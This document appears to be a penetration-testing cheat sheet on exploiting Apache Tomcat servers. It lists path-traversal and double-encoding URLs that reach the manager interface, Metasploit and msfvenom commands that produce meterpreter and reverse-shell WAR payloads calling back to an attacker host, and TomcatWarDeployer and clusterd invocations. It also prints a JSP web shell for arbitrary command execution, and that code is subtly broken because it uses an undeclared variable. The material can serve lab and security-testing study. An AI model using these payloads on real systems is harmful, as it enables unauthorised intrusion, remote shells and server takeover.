Exploitation

Topics

1. Lab Setup & Configuration

2. Enumeration

3. Exploitation

4. Mitigation & Hardening

Common Vulnerabilities

1. Password Backtrace Disclosure Visiting /auth.jsp might reveal passwords in backtraces.

2. Double URL Encoding Vulnerabilities like CVE-2007-1860 allow management interface access via:

   pathTomcat/%252E%252E/manager/html

3. Insecure Example Scripts Apache Tomcat versions 4.x–7.x include examples susceptible to XSS or information disclosure. Examples:

   • /examples/jsp/num/numguess.jsp

   • /examples/servlet/HelloWorldExample Check and restrict access to these paths.

4. Path Traversal Exploit path traversal with:

   <tomcat_target_ip>/lalala/..;/manager/html

   or

   http://<tomcat_target_ip>/;param=value/manager/html

---

Using Metasploit Framework

Leverage the tomcat_mgr_upload exploit available in Metasploit for Tomcat file upload vulnerabilities. Launch Metasploit and execute the following commands:

msfconsole -q
search tomcat_mgr_upload
use 3
set rhosts <tomcat_target_ip>
set rport 8080
set httpusername admin
set httppassword password
set payload linux/x86/meterpreter_reverse_tcp
exploit

After exploitation, a reverse shell is obtained, allowing command execution via the meterpreter shell.

---

Remote Code Execution (RCE)

If you gain access to the /manager/html interface, you can upload and deploy a .war file to achieve RCE.

• Example:

  curl --upload-file shell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/shell"

Metasploit can automate this:

use exploit/multi/http/tomcat_mgr_upload

To create a reverse shell WAR file:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o shell.war

---

Other Methods

1. TomcatWarDeployer Deploy shells or bind shells via:

   ./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

2. Clusterd Automate testing:

   clusterd.py -i <attacker_machine> -a tomcat -v 5.5 --gen-payload <tomcat_target_ip>:4444 --deploy shell.war

3. Manual Web Shell Example JSP for command execution:

   <FORM METHOD=GET ACTION='index.jsp'>
   <INPUT name='cmd' type=text>
   <INPUT type=submit value='Run'>
   </FORM>
   <%@ page import="java.io.*" %>
   <% 
      String cmd = request.getParameter("cmd");
      String output = "";
      if(cmd != null) {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      } 
   %>
   <pre><%=output %></pre>

   Package it into a WAR file and upload it.

---

Other Tools

• Apache Tomcat Scanner